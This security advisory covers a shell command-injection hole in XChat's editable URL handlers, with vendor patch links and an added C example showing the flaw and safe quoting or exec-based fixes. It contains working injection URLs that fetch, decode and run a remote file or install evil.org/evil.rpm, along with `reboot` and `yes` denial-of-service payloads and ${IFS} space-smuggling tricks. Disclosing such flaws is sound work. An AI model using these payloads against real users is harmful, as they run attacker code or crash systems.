COMMAND

    xchat

SYSTEMS AFFECTED

    xchat

PROBLEM

    Zenith Parsec found the following.  Just to show what we mean about
    the possible danger, start Netscape and, in xchat (in a channel  or
    query window), enter the following URL.

        http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'

    Right click on it, and select the Netscape (Existing) or  Netscape
    (New Window) option.   Wait until the  URL loads.   In a shell  on
    your machine type

        tail -2 ~/.bash_profile

        echo You've been hax0red
        echo --zen

    (oops... should've been You\'ve been hax0red, but you get the idea)
    Lucky it wasn't a script that was well written, and designed to use
    script kiddie stuff to hack root or something, eh?

    For the  non-lazy and  the lazy  who were  impressed by  the quick
    demo...

    The  hole  is  in  the  URL  Handler section.  Netscape (Existing)
    causes XChat to run the command

        netscape -remote 'openURL(%s)'

    where the %s is replaced by the selected URL eg:

        http://homepages.ihug.co.nz/~Sneuro/

    causes the command

        netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'

    which opens  that page.   Netscape (Run  New) causes  XChat to run
    the command netscape %s and so on.

    Backticking and shell expansion.  Imagine if someone types:

        l00k @ d15 k3w1 w@r3z  5173! http://www.altavista.com/?x=`date`y='`date`'

    with the (Existing)  or (New Window)  options and others  that use
    'openURL(%s)' type commands to start the program, you get:

        netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'

    Count the 's and you will see that at the 2nd `date` the quotes are
    closed and then reopened, so that `date` isn't  quoted any more...
    leaving it free to run, which it does.

    With the (Run New) type commands (that is  command %s  with no  's
    around the %s) you get:

        netscape http://www.altavista.com/?x=`date`y='`date`'

    which has the 1st `date` unquoted (no 's around it) and so it
    executes.  In real life though, it's unlikely anyone would click on
    a URL like

        http://`reboot`/'`reboot`'

    Still, not all that useful, huh?  Well, URLs can get  pretty  long.
    For example, a cgi-bin call to something can get quite long.

        http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10

    compare that to:

        http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

    quick glance... nothing wrong with it.

    Now, it seems there is a limitation, in that putting spaces in  the
    URL doesn't work, nor does redirection.

    Well, you can put spaces in.  The $IFS variable  (the shell's field
    separator) is probably set, and ${IFS} expands to one.  And who
    needs redirection, when you can do this:

        http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'

    (For (Existing) or (New Window))

        http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"

    By the way, a way to exploit this that's not too blatant, if  you
    don't mind just DoS-ing the victim, is something like

        http://drugs.org/just/say/`yes`

    (warning: following said URL in xchat will eat all the memory  you
    are allowed to eat on your system, and thus tends to crash  poorly-
    configured Linux systems).
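    As an added example (not the advisory's or XChat's own code), the
    following C shows the substitution described above and two defender-
    side fixes.  build_shell_command() produces exactly the string the
    'openURL(%s)' template hands to /bin/sh, so the quote count can be
    inspected without running anything; shell_single_quote() is the
    correct escaping for the case where a user-editable shell template
    must remain (every embedded ' becomes '\'' so backticks, ${IFS} and
    double quotes stay inert); build_handler_argv() and
    launch_url_noshell() are the preferred fix, passing the URL as one
    exec argument with no shell involved.  The example.invalid host and
    the buffer sizes are constructed for this example.

```c
/* Added example (not XChat's code): why the %s-substituted handler template
 * is injectable, and two defensive alternatives. "netscape -remote" and the
 * openURL(%s) template come from the advisory; buffer sizes are ours. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The vulnerable pattern: paste the URL into a shell template and hand the
 * result to system(). Returns 1 and fills out[] with exactly what /bin/sh
 * would parse; the caller can inspect it without executing anything. */
int build_shell_command(const char *url, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "netscape -remote 'openURL(%s)'", url);
    return n >= 0 && (size_t)n < outlen;
}

/* Count occurrences of c in s. For a single-quoted template, more than two
 * single quotes in the final command means the URL closed the quoting and
 * whatever follows is live shell syntax (the advisory's "count the 's"). */
int count_char(const char *s, char c)
{
    int n = 0;
    for (; *s; s++)
        if (*s == c) n++;
    return n;
}

/* Defence 1 (if a user-editable shell template must stay): quote the URL
 * for /bin/sh. The whole value is wrapped in single quotes and each embedded
 * single quote becomes '\'' (close, escaped quote, reopen). Inside single
 * quotes no backtick, $IFS or " has any meaning. Returns 1 on success,
 * 0 if out[] is too small. */
int shell_single_quote(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    if (outlen < 3) return 0;
    out[o++] = '\'';
    for (; *in; in++) {
        const char *rep = (*in == '\'') ? "'\\''" : NULL;
        size_t need = rep ? strlen(rep) : 1;
        if (o + need + 2 > outlen) return 0;   /* keep room for closing quote + NUL */
        if (rep) { memcpy(out + o, rep, need); o += need; }
        else out[o++] = *in;
    }
    out[o++] = '\'';
    out[o] = '\0';
    return 1;
}

/* Defence 2 (preferred): never involve a shell. Build argv directly so the
 * whole URL is one argument and every character in it is literal. argv must
 * have room for 4 pointers; argbuf receives the openURL(...) argument. */
int build_handler_argv(const char *url, char *argbuf, size_t arglen, char **argv)
{
    int n = snprintf(argbuf, arglen, "openURL(%s)", url);
    if (n < 0 || (size_t)n >= arglen) return 0;
    argv[0] = "netscape";
    argv[1] = "-remote";
    argv[2] = argbuf;
    argv[3] = NULL;
    return 1;
}

/* fork + execvp with the argv above. Returns the child's exit status, or -1. */
int launch_url_noshell(const char *url)
{
    char argbuf[4096];
    char *argv[4];
    if (!build_handler_argv(url, argbuf, sizeof argbuf, argv)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);            /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed URL in the shape of the advisory's example; example.invalid is not a real host. */
    const char *url = "http://example.invalid/?x=`date`y='`date`'";
    char cmd[512], quoted[512];

    build_shell_command(url, cmd, sizeof cmd);
    printf("template gives : %s\n", cmd);
    printf("single quotes  : %d (2 expected; more means the URL broke out)\n",
           count_char(cmd, '\''));

    shell_single_quote(url, quoted, sizeof quoted);
    printf("quoted argument: %s\n", quoted);
    return 0;
}
```

    The unquoted "command %s" handler variants are worse still, since
    there is no quoting at all to break out of; the argv launcher covers
    both cases because the string never reaches a shell.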

SOLUTION

    It seems that this bug only affects XChat versions 1.3.9 and  above,
    up to and including 1.4.2 (the devel series may also be  vulnerable,
    as there is no mention of this bug on the changelog page).   Release
    1.3.9 was the first to have editable URL handlers, which seem to  be
    the cause.  The bug is verified to exist on [x]chat 1.5.5.

    Version 1.2.1 of xchat does not appear to be vulnerable.

    For Red Hat:

        sparc: ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
        alpha: ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
         i386: ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
      sources: ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm

    For Linux-Mandrake:

        7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
        7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/xchat-1.4.2-4cl.i386.rpm

    Just to chime in here: for distributions that haven't released  an
    update, the source for 1.4.2 is available on the author's  website
    for the impatient:

        http://xchat.linuxpower.org/index.html

    The latest stable release of Debian is not vulnerable.  Others:

        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-all/xchat-common_1.4.3-0.1_all.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-gnome_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-text_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-gnome_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-text_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-gnome_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-text_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-gnome_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-text_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-gnome_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-text_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-gnome_1.4.3-0.1_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-text_1.4.3-0.1_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat_1.4.3-0.1_sparc.deb

    Slackware 7.1 does ship with xchat.  It is not vulnerable.

    An  essential  update  is  available  immediately from Helix Code,
    Inc.   via the  Helix GNOME  Updater and  from the following URLs.
    For Caldera OpenLinux eDesktop 2.4 systems:

        http://spidermonkey.helixcode.com/distributions/Caldera-2.4/xchat-1.4.3-0_helix_1.i386.rpm

    For Debian GNU/Linux potato (2.2) and woody systems:

        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat_1.4.3-helix1_i386.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-common_1.4.3-helix1_all.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-text_1.4.3-helix1_i386.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-gnome_1.4.3-helix1_i386.deb

    For LinuxPPC systems:

        http://spidermonkey.helixcode.com/distributions/LinuxPPC/xchat-1.4.3-0_helix_1.ppc.rpm

    For Linux Mandrake systems:

        http://spidermonkey.helixcode.com/distributions/Mandrake/xchat-1.4.3-0mdk_helix_1.i586.rpm

    For Red Hat Linux systems:

        http://spidermonkey.helixcode.com/distributions/RedHat-6/xchat-1.4.3-0_helix_1.i386.rpm

    For Solaris running on UltraSparc systems:

        http://spidermonkey.helixcode.com/distributions/Solaris/xchat-1.4.3-0_helix_1.sparc64.rpm

    For SuSE 6.3 systems:

        http://spidermonkey.helixcode.com/distributions/SuSE/xchat-1.4.3-0_helix_1.i386.rpm

    For SuSE 6.4 systems:

        http://spidermonkey.helixcode.com/distributions/SuSE-6.4/xchat-1.4.3-0_helix_1.i386.rpm

    For TurboLinux systems:

        http://spidermonkey.helixcode.com/distributions/TurboLinux-6/xchat-1.4.3-0_helix_1.i386.rpm

    For Linux-Mandrake:

        Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
                            7.0/SRPMS/xchat-1.4.1-4mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
                            7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm

    For FreeBSD:

        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz

    Users of Slackware 7.0, 7.1, and -current are urged  to  upgrade  to
    the xchat.tgz  package  available  in  the  Slackware  -current
    branch:

        ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/gtk/xchat.tgz

    For TurboLinux:

        ftp://ftp.turbolinux.com/pub/updates/6.0/xchat-1.4.3-1.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xchat-1.4.3-1.src.rpm

    Note:  You  must  rebuild  and  install  the  RPM if you choose to
    download and install the SRPM.   Simply installing the SRPM  alone
    WILL NOT CLOSE THE SECURITY HOLE.